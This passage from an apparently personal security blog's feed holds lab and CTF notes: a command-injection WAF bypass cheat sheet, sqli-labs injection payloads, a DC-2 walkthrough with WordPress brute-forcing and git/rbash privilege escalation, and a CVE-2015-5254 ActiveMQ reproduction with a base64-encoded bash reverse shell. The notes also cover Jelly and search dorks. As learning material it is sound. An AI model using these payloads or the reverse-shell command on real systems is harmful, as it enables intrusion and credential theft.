class="hljs-built_in">+</span></span>[]]]+(<span class="hljs-name">!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">!+</span>[]+!+[]+!+[]]+(<span class="hljs-name">!!</span>[]+[])[<span class="hljs-name">+!+</span>[]]])[<span class="hljs-name">!+</span>[]+!+[]+[<span class="hljs-name"><span class="hljs-built_in">+</span></span>[]]])()<br></code></pre></td></tr></table></figure><p>This snippet is alert(1); run it in the console of the browser's developer tools.</p>]]></content>
</entry>
<entry>
<title>day01</title>
<link href="/2025/01/02/day01/"/>
<url>/2025/01/02/day01/</url>
<content type="html"><![CDATA[<h1 id="新刊blog,堂堂连载"><a href="#新刊blog,堂堂连载" class="headerlink" title="New blog, proudly serialised"></a>New blog, proudly serialised</h1>]]></content>
</entry>
<entry>
<title>WAF bypass summary</title>
<link href="/2024/12/11/rce%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/"/>
<url>/2024/12/11/rce%E7%BB%95%E8%BF%87%E6%80%BB%E7%BB%93/</url>
<content type="html"><![CDATA[<h1 id="waf绕过总结"><a href="#waf绕过总结" class="headerlink" title="WAF bypass summary"></a>WAF bypass summary</h1><h2 id="ping"><a href="#ping" class="headerlink" title="ping"></a>ping</h2><p>In a ping feature there are places where ; or | can be appended to execute commands directly, but at that point you run into a WAF that blocks the attempt, and those WAF rules need to be bypassed</p><h2 id="空格绕过:"><a href="#空格绕过:" class="headerlink" title="Space bypass:"></a>Space bypass:</h2><p>Under bash you can use $IFS, ${IFS}, $IFS$9, %09, <, >, <>, {,} (for example {cat,/etc/passwd}), %20 (space), %09 (tab)</p><h2 id="命令执行函数system-绕过"><a href="#命令执行函数system-绕过" class="headerlink" title="Bypassing a filter on the command-execution function system()"></a>Bypassing a filter on the command-execution function system()</h2><p>System command functions: system(), passthru(), exec(), shell_exec(), popen(), proc_open(), pcntl_exec() and backticks (`), which behave like shell_exec(). Any of these functions can be used to get around a filter on one of them.</p><h2 id="命令链接符:"><a href="#命令链接符:" class="headerlink" title="Command connectors:"></a>Command connectors:</h2><p>Command connectors supported by both Windows and Linux:<br>cmd1 | cmd2 only cmd2's result is shown<br>cmd1 || cmd2 cmd2 is executed only after cmd1 fails<br>cmd1 & cmd2 cmd1 runs first, then cmd2 runs regardless of whether cmd1 succeeded<br>cmd1 && cmd2 cmd1 runs first, and cmd2 runs only if cmd1 succeeded<br>Linux also supports the semicolon (;): cmd1;cmd2 runs them in order, cmd1 first and then cmd2 </p><h2 id="正则匹配绕过"><a href="#正则匹配绕过" class="headerlink" title="Regex-match bypass"></a>Regex-match bypass</h2><h3 id="双写绕过"><a href="#双写绕过" class="headerlink" title="Double-writing bypass"></a>Double-writing bypass</h3><p>An ordinary regex replacement matches only once, so doubling the keyword bypasses it: in pphphp only the middle php is filtered out and the remaining parts form a second php; phpphpinfoinfo works the same way.</p><h3 id="利用变量绕过"><a href="#利用变量绕过" class="headerlink" title="Bypass with variables"></a>Bypass with variables</h3><p>a=c;b=a;c=t;<br>$a$b$c /etc/passwd</p><h3 id="利用base编码绕过"><a href="#利用base编码绕过" class="headerlink" title="Bypass with base64 encoding"></a>Bypass with base64 encoding</h3><p>echo 'cat' | base64<br>Y2F0wqAK<br>`echo 'Y2F0wqAK' | base64 -d` /etc/passwd<br>echo 'Y2F0IC9ldGMvcGFzc3dk' | base64 -d | bash // cat /etc/passwd </p><h3 id="利用hex编码绕过"><a href="#利用hex编码绕过" class="headerlink" title="Bypass with hex encoding"></a>Bypass with hex encoding</h3><p>echo "636174202F6574632F706173737764" | xxd -r -p | bash // the 0x prefix of the hex encoding is not entered</p><h3 id="利用oct编码(八进制)绕过"><a href="#利用oct编码(八进制)绕过" class="headerlink" title="Bypass with octal encoding"></a>Bypass with octal encoding</h3><p>$(printf "\154\163") // the ls command</p><h3 id="利用16进制编码绕过"><a href="#利用16进制编码绕过" class="headerlink" title="Bypass with hexadecimal escapes"></a>Bypass with hexadecimal escapes</h3><p>"\x73\x79\x73\x74\x65\x6d"("cat /etc/passwd")</p><h3 id="利用拼接绕过"><a href="#利用拼接绕过" class="headerlink" title="Bypass with concatenation"></a>Bypass with concatenation</h3><p>(sy.(st).em)(whoami);//<br>c''a''t /etc/passwd // single quotes<br>c""a""t /etc/passwd // double quotes<br>c`a`t /etc/passwd // backticks<br>c\a\t /etc/passwd // backslash<br>$* and $@, $x (x from 1 to 9), ${x} (x>=10):<br>for example ca${21}t a.txt means cat a.txt; when no arguments are passed, these special parameters expand to nothing, as below:<br>wh$1oami<br>who$@ami<br>whoa$*mi<br>666`whoami`666 //bash: 666root666: command not found<br>666`\whoami`666 //bash: 666root666: command not found<br>// the command's result sits between the two 666s </p><h3 id="插入注释"><a href="#插入注释" class="headerlink" title="Inserting comments"></a>Inserting comments</h3><p>(useful for getting around WAF rule sets that block specific PHP function names)<br>system/*A10ng_*/(whoami);<br>system/*A10ng_*/(wh./*A10ng_*/(oa)/*caixukun*/.mi);<br>(sy./*A10ng_*/(st)/*A10ng_*/.em)/*A10ng_*/(wh./*A10ng_*/(oa)/*A10ng_*/.mi);</p><h3 id="利用未初始化变量"><a href="#利用未初始化变量" class="headerlink" title="Using uninitialized variables"></a>Using uninitialized variables</h3><p>cat$u /etc/passwd<br>cat /etc$u/passwd</p><h3 id="过滤了斜杠’-‘"><a href="#过滤了斜杠’-‘" class="headerlink" title="When the slash '/' is filtered"></a>When the slash '/' is filtered</h3><p>Chain commands with ';' to bypass it<br>cd ..;cd ..;cd ..;cd ..;cd etc;cat passwd</p><h3 id="利用通配符绕过"><a href="#利用通配符绕过" class="headerlink" title="Bypass with wildcards"></a>Bypass with wildcards</h3><p>cat /etc/passwd:<br>??? /e??/?a????</p><h3 id="利用path绕过"><a href="#利用path绕过" class="headerlink" title="Bypass with PATH"></a>Bypass with PATH</h3><p>Slicing and concatenating $PATH yields the characters needed to get a shell<br>${PATH:5:1} //l<br>${PATH:2:1} //s<br>${PATH:5:1}${PATH:2:1} // concatenates to ls and runs the command<br>${PATH:5:1}s // concatenates to ls and runs the command </p><h3 id="异或绕过"><a href="#异或绕过" class="headerlink" title="XOR bypass"></a>XOR bypass</h3><figure class="highlight py"><pre><code class="hljs py">def xor():
    # Print every pair of ASCII codes together with the character their XOR produces,
    # so a wanted letter can be looked up as the XOR of two other characters
    for i in range(0, 128):
        for j in range(0, 128):
            result = i ^ j
            print(chr(i) + ' ^ ' + chr(j) + ' == > ' + chr(result) + " ASCII:" + str(result))

if __name__ == "__main__":
    xor()
</code></pre></figure><p>('GGGGGGG'^'7/7.)!(')();<br>where 'G'^'7'=p, 'G'^'/'=h and so on, piecing together the command you want.</p><h3 id="取反绕过"><a href="#取反绕过" class="headerlink" title="Bitwise-NOT bypass"></a>Bitwise-NOT bypass</h3><p>The reason for taking the bitwise NOT here is that it hides the letters, is reversible, and is compatible with URL encoding and binary data.<br>Bitwise NOT is an obfuscation technique: it turns sensitive characters into a form that is hard to recognise and so evades detection, whereas without it the sensitive characters are exposed directly or are easier to decode and detect. Combined with methods such as urlencode(), bitwise NOT raises the complexity of the bypass and improves its stealth</p><figure class="highlight php"><pre><code class="hljs php"><?php
echo urlencode(~'phpinfo');
?>
</code></pre></figure><p>For example, phpinfo() becomes:<br>(~'%8F%97%8F%96%91%99%90')();</p><figure class="highlight php"><pre><code class="hljs php"><?php
$a = "system";
$b = "ls /";
echo urlencode(~$a); // ~$a: bitwise NOT of every byte
print("\n");
echo urlencode(~$b); // ~$b: bitwise NOT of every byte
?>
// resulting payload:
// payload=?wllm=(~%8c%86%8c%8b%9a%92)(~%9C%9E%8B%DF%D0%99%D5);
</code></pre></figure><h2 id="htaccess文件包含绕过"><a href="#htaccess文件包含绕过" class="headerlink" title=".htaccess file-inclusion bypass"></a>.htaccess file-inclusion bypass</h2><figure class="highlight apache"><pre><code class="hljs apache"># Matches only 1.jpg; it can also be applied to all files, parsing them as PHP
<FilesMatch "1.jpg">
SetHandler application/x-httpd-php
</FilesMatch>
</code></pre></figure>]]></content>
<categories>
<category>Network</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>Jelly: executable XML files on the web</title>
<link href="/2024/12/11/web%E4%B8%AD%E5%8F%AF%E6%89%A7%E8%A1%8C%E7%9A%84xml%E6%96%87%E4%BB%B6jelly/"/>
<url>/2024/12/11/web%E4%B8%AD%E5%8F%AF%E6%89%A7%E8%A1%8C%E7%9A%84xml%E6%96%87%E4%BB%B6jelly/</url>
<content type="html"><![CDATA[<h1 id="简介"><a href="#简介" class="headerlink" title="Introduction"></a>Introduction</h1><p>I haven't written anything for a long time. A recent CTF had a Jelly challenge, so I'm writing it down; it was a web challenge from the Guocheng Cup, described as follows:</p><h2 id="Jelly简介"><a href="#Jelly简介" class="headerlink" title="Jelly overview"></a>Jelly overview</h2><p><a href="https://commons.apache.org/proper/commons-jelly/">Jelly's official introduction</a></p><p>Jelly is short for Java Server Pages XML. It is an XML-based scripting language used to generate dynamic content in Java EE applications: it lets developers write Java logic with XML tags and so generate dynamic content.</p><p>Jelly scripts are usually embedded in JSP files, where special XML tags execute Java code. These tags are called Jelly tags; they can execute Java code, access Java objects, handle requests and responses, and so on.</p><h2 id="如何实现并工作的"><a href="#如何实现并工作的" class="headerlink" title="How it is implemented and works"></a>How it is implemented and works</h2><figure class="highlight xml"><pre><code class="hljs xml"><document time="${now}">
  Welcome ${user.name} to Jelly!
</document>
</code></pre></figure><p>The original Java class</p><figure class="highlight java"><pre><code class="hljs java">public class MyTask {

    // Backing fields for the two properties below
    private int x;
    private String y;

    // 'doIt' method that does some function/task...
    public void run() throws Exception {
        // do something...
    }

    // Properties, can be any type
    public void setX(int x) {
        this.x = x;
    }
    public void setY(String y) {
        this.y = y;
    }
}
</code></pre></figure><p>The Jelly file that calls the class</p><figure class="highlight xml"><pre><code class="hljs xml"><j:jelly xmlns:j="jelly:core" xmlns:define="jelly:define" xmlns:my="myTagLib">

  <define:taglib uri="myTagLib">
    <define:jellybean name="foo" className="MyTask"/>
  </define:taglib>

  Now lets use the new tag

  <my:foo x="2" y="cheese"/>

</j:jelly>
</code></pre></figure><h2 id="继承功能"><a href="#继承功能" class="headerlink" title="Inherited features"></a>Inherited features</h2><p>Jelly inherits from JSTL, Ant, XML, Web Services and more, so it can perform many functions</p>]]></content>
<categories>
<category>Network</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>sqli10-20</title>
<link href="/2024/12/09/sqli10-20/"/>
<url>/2024/12/09/sqli10-20/</url>
<content type="html"><![CDATA[<h1 id="sqli11-20"><a href="#sqli11-20" class="headerlink" title="sqli11-20"></a>sqli11-20</h1><h2 id="11"><a href="#11" class="headerlink" title="11"></a>11</h2><p>Entering 1' produces an error message, so injection exists<br><img src="https://gitee.com/fogpost/photo/raw/master/202412091947957.png" srcset="/img/loading.gif" lazyload><br>1' or 1=1 # succeeds, and 1'union select 1,2# injects successfully, same as sqli 1<br><img src="https://gitee.com/fogpost/photo/raw/master/202412091949999.png" srcset="/img/loading.gif" lazyload></p><h2 id="12"><a href="#12" class="headerlink" title="12"></a>12</h2><p>String injection with quotes; payload as follows</p><blockquote><p>1") or 1=1<br>1") union select 1,2#</p></blockquote><h2 id="13-14"><a href="#13-14" class="headerlink" title="13,14"></a>13,14</h2><p>Same as above, differing only in the quotes and parentheses</p><h2 id="15"><a href="#15" class="headerlink" title="15"></a>15</h2><p>Same as 11, as a boolean-based blind injection</p><h2 id="16"><a href="#16" class="headerlink" title="16"></a>16</h2><p>Same as 12, as a boolean-based blind injection</p><h2 id="17"><a href="#17" class="headerlink" title="17"></a>17</h2><p>Key point: three kinds of error-based injection<br>extractvalue() error-based injection, updatexml() error-based injection and group by() error-based injection<br>Principle</p>]]></content>
<categories>
<category>SQL</category>
</categories>
<tags>
<tag>sql</tag>
</tags>
</entry>
<entry>
<title>DC-2</title>
<link href="/2024/11/28/DC-2/"/>
<url>/2024/11/28/DC-2/</url>
<content type="html"><![CDATA[<h1 id="DC-2"><a href="#DC-2" class="headerlink" title="DC-2"></a>DC-2</h1><p>Nothing to do today, so I am back at the target machines. I should do less of this; I plan to finish the DC series and then go deeper into study, and it is time to work through eviden's fofa tutorial</p><p>Local IP: 192.168.56.135<br>Target IP: 192.168.56.147</p><h2 id="信息收集"><a href="#信息收集" class="headerlink" title="信息收集"></a>Information gathering</h2><p>nmap scan of the local subnet; host discovery with -sP, used for probing hosts on the internal network</p><blockquote><p>nmap -sP 192.168.56.135/24<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282257172.png" srcset="/img/loading.gif" lazyload><br>Port scan<br>nmap -A -p- 192.168.56.147<br>A detailed all-port scan of the target IP finds two services, on ports 80 and 7744: http and ssh<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282301709.png" srcset="/img/loading.gif" lazyload></p></blockquote><h2 id="渗透测试"><a href="#渗透测试" class="headerlink" title="渗透测试"></a>Penetration testing</h2><h3 id="修改hosts"><a href="#修改hosts" class="headerlink" title="修改hosts"></a>Modifying hosts</h3><p>Visiting the web site reveals a redirect to a domain name, so we need to edit the hosts file and point the domain at the target IP<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282305798.png" srcset="/img/loading.gif" lazyload></p><blockquote><p>vim /etc/hosts<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282308689.png" srcset="/img/loading.gif" lazyload><br>Visit again, reach the main page and find a flag telling us to brute-force accounts<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282309300.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411282311344.png" srcset="/img/loading.gif" lazyload></p></blockquote><h3 id="wpscan爆破账户"><a href="#wpscan爆破账户" class="headerlink" title="wpscan爆破账户"></a>Brute-forcing accounts with wpscan</h3><p>After reaching the site, fingerprint it with whatweb or Wappalyzer; it turns out to be built on WordPress</p><blockquote><p>whatweb 192.168.56.147<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282312143.png" srcset="/img/loading.gif" lazyload><br>Run a directory scan to look for the admin page; the backend admin page is found<br>dirb <a href="http://dc-2/">http://dc-2/</a><br><img src="https://gitee.com/fogpost/photo/raw/master/202411282314018.png" srcset="/img/loading.gif" lazyload><br>There seems to be a dedicated WordPress tool, wpscan; scan with wpscan. Common commands:<br>wpscan --url <a href="http://dc-2/">http://dc-2</a> scan the version<br>wpscan --url <a href="http://dc-2/">http://dc-2</a> --enumerate t scan themes<br>wpscan --url <a href="http://dc-2/">http://dc-2</a> --enumerate p scan plugins<br>wpscan --url <a href="http://dc-2/">http://dc-2</a> --enumerate u enumerate users </p></blockquote><p>The version scan shows 4.7.10, and wpscan is used to enumerate users<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282322816.png" srcset="/img/loading.gif" lazyload><br>Three users are found: admin, jerry, tom<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282324996.png" srcset="/img/loading.gif" lazyload><br>Following flag1, generate a wordlist with cewl and brute-force</p><blockquote><p>cewl <a href="http://dc-2/">http://dc-2/</a> > 1.txt generate the wordlist<br> CeWL (Custom Word List Generator) is an application written in Ruby that crawls the content of a given URL and, according to the parameters and options the user sets, generates a custom wordlist file. These wordlists can be used in password guessing, brute-force and similar attack scenarios to raise the success rate of a penetration test</p></blockquote><blockquote><p>wpscan --url <a href="http://dc-2/">http://dc-2</a> --passwords 1.txt brute-force passwords; the passwords of jerry and tom are found </p></blockquote><p>jerry/adipiscing<br>tom/parturient </p><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282328174.png" srcset="/img/loading.gif" lazyload></p><p>Try logging in as jerry and find flag2, which hints that we should log in over ssh<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282330516.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411282330233.png" srcset="/img/loading.gif" lazyload></p><h3 id="ssh登录"><a href="#ssh登录" class="headerlink" title="ssh登录"></a>ssh login</h3><blockquote><p>ssh <a href="mailto:tom@192.168.56.147">tom@192.168.56.147</a> -p 7744<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282333534.png" srcset="/img/loading.gif" lazyload><br>Login succeeds; flag3 is found locally, but only vi is available, and it tells us to escalate privileges<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282335807.png" srcset="/img/loading.gif" lazyload></p></blockquote><h3 id="rbash提权"><a href="#rbash提权" class="headerlink" title="rbash提权"></a>rbash privilege escalation</h3><p>Check which programs the current user is allowed to run</p><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282337342.png" srcset="/img/loading.gif" lazyload></p><p>Use echo to bypass rbash</p><blockquote><p>Obtain the jerry user's privileges<br>export -p //view environment variables<br>BASH_CMDS[a]=/bin/sh;a //assign /bin/sh to a<br>/bin/bash<br>export PATH=$PATH:/bin/ //add to the PATH environment variable<br>export PATH=$PATH:/usr/bin //add to the PATH environment variable</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282345295.png" srcset="/img/loading.gif" lazyload></p><p>Look for commands that can run with root privileges</p><blockquote><p>find / -user root -perm -4000 -print 2>/dev/null</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282354377.png" srcset="/img/loading.gif" lazyload></p><blockquote><p>su jerry use su to get jerry's privileges; the password can now be used<br>Now we can read jerry's flag4, which hints at privilege escalation through git</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282341436.png" srcset="/img/loading.gif" lazyload></p><blockquote><p>sudo -l shows that git can be used</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411282351395.png" srcset="/img/loading.gif" lazyload></p><blockquote><p>sudo git help status </p></blockquote><p>View the git command; on the command line of the page that opens, enter<br>!/bin/sh to escalate privileges<br><img src="https://gitee.com/fogpost/photo/raw/master/202411282357480.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411282359962.png" srcset="/img/loading.gif" lazyload></p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h2><p>That completes it; the knowledge points include the usage of wpscan, privilege escalation through git, and the rbash bypass</p>]]></content>
<categories>
<category>Penetration Testing</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>CVE-2015-5254</title>
<link href="/2024/11/27/CVE-2015-5254/"/>
<url>/2024/11/27/CVE-2015-5254/</url>
<content type="html"><![CDATA[<h1 id="CVE-2015-5254"><a href="#CVE-2015-5254" class="headerlink" title="CVE-2015-5254"></a>CVE-2015-5254</h1><p>First time writing one of these; playing with this CVE, starting from the old ones. This is a deserialization vulnerability<br>The default username and password are admin/admin</p><h2 id="漏洞描述"><a href="#漏洞描述" class="headerlink" title="漏洞描述"></a>Vulnerability description</h2><p>Vulnerability ID: CVE-2015-5254<br>Affected versions: Apache ActiveMQ 5.x before 5.13.0, <a href="https://www.cvedetails.com/cve/CVE-2015-5254/">https://www.cvedetails.com/cve/CVE-2015-5254/</a><br>Cause: the vulnerability stems from the program not restricting the classes that can be serialized in the broker. A remote attacker can exploit it to execute arbitrary code with a specially crafted serialized Java Message Service (JMS) ObjectMessage object.</p><p>vulnP:110.41.22.24:8186<br>This is my own server; that port should be closed by now, I close it as soon as I am done. If you want to play with it, tell me and I will open it for you; it is just a docker container, so it does not matter if it gets wrecked<br>hackIP:172.20.205.57</p><h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>Reproducing the vulnerability</h2><p>This vulnerability involves two ports: 61616 is the working port used for message passing, and 8161 is the management page</p><p><img src="https://gitee.com/fogpost/photo/raw/master/202411271814424.png" srcset="/img/loading.gif" lazyload><br>Visiting the page directly shows a CMS framework, Apache ActiveMQ; since this is a reproduction we already know its version clearly. If the version were unknown, you could trigger an error page by entering random paths, or use the Yunxi fingerprinting service to detect the version.</p><blockquote><p>whatweb <a href="http://110.41.22.24:8161/">http://110.41.22.24:8161/</a> can show the version</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411271821474.png" srcset="/img/loading.gif" lazyload><br><a href="https://github.com/matthiaskaiser/jmet/releases/download/0.1.0/jmet-0.1.0-all.jar">jmet</a></p><blockquote><p>java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "touch /tmp/success" -Yp ROME 110.41.22.24 61616<br>Note that the Java version must be 8 or lower</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411271853828.png" srcset="/img/loading.gif" lazyload><br>This places an event queue in the admin interface; look at the message<br><img src="https://gitee.com/fogpost/photo/raw/master/202411271859064.png" srcset="/img/loading.gif" lazyload><br><img src="https://gitee.com/fogpost/photo/raw/master/202411271900112.png" srcset="/img/loading.gif" lazyload><br>Clicking any message triggers it, and the command touch /tmp/success has been executed<br><img src="https://gitee.com/fogpost/photo/raw/master/202411271907776.png" srcset="/img/loading.gif" lazyload> </p><blockquote><p>java -jar jmet-0.1.0-all.jar -Q event -I ActiveMQ -s -Y "bash -c {echo,YmFzaCAtaT4vZGV2L3RjcC8xOTIuMTY4LjE4LjI0NC8xMjM0IDA+JjE=}|{base64,-d}|{bash,-i}" -Yp ROME 110.41.22.24 61616</p></blockquote><p><img src="https://gitee.com/fogpost/photo/raw/master/202411271911825.png" srcset="/img/loading.gif" lazyload></p><p>After this runs, a new message appears on the admin side, and clicking it connects the shell back to us<br><img src="https://gitee.com/fogpost/photo/raw/master/202411271909000.png" srcset="/img/loading.gif" lazyload><br>One thing I noticed: nc can only listen on local interfaces, and this reverse shell has some issues. Because I am not good at handling the IP translation there may be problems, and the reverse shell is also a bit off; I will see whether I can do it again later on the local internal network</p><h2 id="总结"><a href="#总结" class="headerlink" title="总结"></a>Summary</h2><p>This CVE requires tricking the administrator into clicking while also attacking from inside the internal network, so it is fairly weak, but the attack method is relatively simple and easy to reproduce; the hard part is in writing the exploit. At some point I should look at the contents of this jar</p>]]></content>
<categories>
<category>CVE</category>
</categories>
<tags>
<tag>target</tag>
</tags>
</entry>
<entry>
<title>Web Miscellany</title>
<link href="/2024/11/27/web%E6%9D%82%E9%A1%B9/"/>
<url>/2024/11/27/web%E6%9D%82%E9%A1%B9/</url>
<content type="html"><![CDATA[<h1 id="搜索技巧"><a href="#搜索技巧" class="headerlink" title="搜索技巧"></a>Search techniques</h1><ul><li>site:<a href="http://www.hao123/">www.hao123</a>. <ul><li>Returns everything on this target site that the search engine has crawled and indexed<br><img src="https://gitee.com/fogpost/photo/raw/master/202411271724499.png" srcset="/img/loading.gif" lazyload></li></ul></li><li>site:<a href="http://www.hao123.com/">www.hao123.com</a> keyword<ul><li>Returns all indexed pages of the target site that contain this keyword</li><li>Here the keyword can be set to things like site backend, admin backend, password change, password recovery and so on</li></ul></li><li>site:<a href="http://www.hao123.com/">www.hao123.com</a> inurl:admin.php<ul><li>Returns all pages of the target site whose address contains admin.php; admin.php, manage.php or other keywords can be used to find key functional pages</li></ul></li><li>link:<a href="http://www.hao123.com/">www.hao123.com</a><ul><li>Returns all pages that contain links to the target site, including the personal blogs of its developers, development logs, or the third-party companies and partners that operate this site</li></ul></li><li>related:<a href="http://www.hao123.com/">www.hao123.com</a><ul><li>Returns all pages "similar" to the target site, which may contain information about common software in use</li></ul></li><li>intitle:"500 Internal Server Error" "server at"<ul><li>Search for error pages</li></ul></li><li>inurl:"nph-proxy.cgi" "Start browsing"<ul><li>Search for proxy servers</li></ul></li></ul>]]></content>
<categories>
<category>Network</category>
</categories>
<tags>
<tag>web</tag>
</tags>
</entry>
<entry>
<title>sqli 1-10 Practice</title>
<link href="/2024/11/24/sqli%E7%BB%83%E4%B9%A0/"/>
<url>/2024/11/24/sqli%E7%BB%83%E4%B9%A0/</url>
<content type="html"><![CDATA[<h1 id="sqli开头简介"><a href="#sqli开头简介" class="headerlink" title="sqli开头简介"></a>Introduction to sqli</h1><p>SQL injection can be understood as constructing malicious input so that the program executes the code we want it to execute. So we need to understand what the SQL statements and filters in the source code look like, but in a black-box setting we cannot see the code, which requires enough accumulated knowledge. So I plan to finish this practice range; I am going to become a master of the SQL field 🥰!</p><h1 id="前置知识点"><a href="#前置知识点" class="headerlink" title="前置知识点"></a>Prerequisite knowledge</h1><p>Characteristics of UNION queries:<br>1. The combined queries must have the same number of columns!<br>2. The type and order of each column in the combined queries should ideally match<br>3. The union keyword removes duplicates by default; union all keeps duplicate rows </p><p>version(): show the database version<br>database(): show the database in use<br>user(): show the current user<br>limit: the limit clause fetches all data in batches<br>group_concat(): fetch all the database information at once</p><p>information_schema.tables: contains all the tables in the database<br>table_name: table name<br>table_schema: database name<br>column_name: column name</p><p>--dbs: list all databases<br>--tables: list all tables<br>--columns: list all column names in a table<br>--dump: dump the data of a given table</p><h1 id="联合注入"><a href="#联合注入" class="headerlink" title="联合注入"></a>UNION-based injection</h1><h2 id="手工注入"><a href="#手工注入" class="headerlink" title="手工注入"></a>Manual injection</h2><ol><li>First enter 1 and the page returns normally; enter ?id=1', which returns an error, showing that a single-quote injection exists<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060247359.png" srcset="/img/loading.gif" lazyload></li><li>Enter ?id=1' and '1'='1, and the page displays normally<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060248949.png" srcset="/img/loading.gif" lazyload></li><li>Construct ?id=1' and '1'='1' order by 1--+ page displays normally<br>?id=1' and '1'='1' order by 2--+ page displays normally<br>?id=1' and '1'='1' order by 3--+ page displays normally<br>?id=1' and '1'='1' order by 4--+ error page appears<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060250107.png" srcset="/img/loading.gif" lazyload><br>So we learn that the table has only three columns, which determines the column count</li><li>Construct the UNION query ?id=-1' union select 1,2,3--+. The leading id of -1 makes the first statement return nothing, and the union query shows which columns are echoed; 2 and 3 are echoed<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060254643.png" srcset="/img/loading.gif" lazyload></li><li>Construct ?id=-1' union select 1,database(),version()--+ and the database name and version information are echoed<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060256922.png" srcset="/img/loading.gif" lazyload></li><li>Construct ?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()--+ and the table names in the database are echoed<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060259924.png" srcset="/img/loading.gif" lazyload></li><li>Query the column names of users: ?id=-1' union select 1,2,group_concat(column_name)from information_schema.columns where table_name='users'--+<br><img src="https://gitee.com/fogpost/photo/raw/master/202410060302469.png" srcset="/img/loading.gif" lazyload></li><li>Query the contents of the users table: -1' union select 1,2,group_concat(0x5c,username,0x5c,password) from users --+ 0x5c is the hex of a backslash, used to join the data of the two columns<br>This is the basis of manual injection; most injections are refinements of the above</li></ol><h2 id="sqlmap注入"><a href="#sqlmap注入" class="headerlink" title="sqlmap注入"></a>sqlmap injection</h2><p>sqlmap -u <a href="http://sql/sqli-labs-master/Less-1/id=1">http://sql/sqli-labs-master/Less-1/id=1</a> --dbs list the corresponding databases<br>A dedicated sqlmap tutorial will follow later, so no more on it here</p><h1 id="bool盲注"><a href="#bool盲注" class="headerlink" title="bool盲注"></a>Boolean blind injection</h1><p>?id=1'and length((select database()))>9--+<br>#The greater-than sign can be replaced with less-than or equals; the point is to determine the length of the database name. length() gets the length of the current database name; if the database is haha, length() is 4<br>?id=1'and ascii(substr((select database()),1,1))=115--+<br>#substr("78909",1,1)=7. In substr(a,b,c), a is the string to cut, b is the starting position and c is the length. In boolean blind injection the length is always 1 because we judge one character at a time. ascii() converts the extracted character to its ASCII code, so we can pin down the number and map it back to the character.</p><p>?id=1'and length((select group_concat(table_name) from information_schema.tables where table_schema=database()))>13--+<br>Determine the total length of all table names.<br>?id=1'and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schema=database()),1,1))>99--+<br>Determine the table names character by character</p><p>?id=1'and length((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'))>20--+<br>Determine the total length of all column names<br>?id=1'and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),1,1))>99--+<br>Determine the column names character by character.</p><p>?id=1' and length((select group_concat(username,password) from users))>109--+<br>Determine the length of the column contents<br>?id=1' and ascii(substr((select group_concat(username,password) from users),1,1))>50--+<br>Check the contents character by character.</p><h2 id="双查询注入"><a href="#双查询注入" class="headerlink" title="双查询注入"></a>Double-query injection</h2><p><a href="https://blog.csdn.net/xiayun1995/article/details/86512290">Reference</a><br>After understanding the basic principle of boolean blind injection we notice a problem: manual injection inevitably takes a long time. Hence double-query injection, which lets us avoid the long, tedious operations and obtain database information directly. Before the explanation we need to understand a few functions</p><h3 id="函数"><a href="#函数" class="headerlink" title="函数"></a>Functions</h3><p>rand(): random number function, returns a number between 0 and 1<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241656811.png" srcset="/img/loading.gif" lazyload><br>floor(): rounds down; floor's rounding down truncates to an integer, and adding multiplication lets us build a choice among arbitrary random integers<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241658373.png" srcset="/img/loading.gif" lazyload><br>concat(): string concatenation function, used to join the data we query<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241701358.png" srcset="/img/loading.gif" lazyload><br>group by: grouping; as (alias): gives the query result an alias (the part in parentheses is a custom alias)<br><img src="https://gitee.com/fogpost/photo/raw/master/202411241707695.png" srcset="/img/loading.gif" lazyload><br>count(): aggregate function<br>Here count(*) is used to count the rows returned earlier. Because of group by and the random number, duplicate keys may appear; when a key is duplicated an error is triggered and reported. Since the subquery has already completed before the error occurs, the content of the subquery is displayed along with the error message<br><img 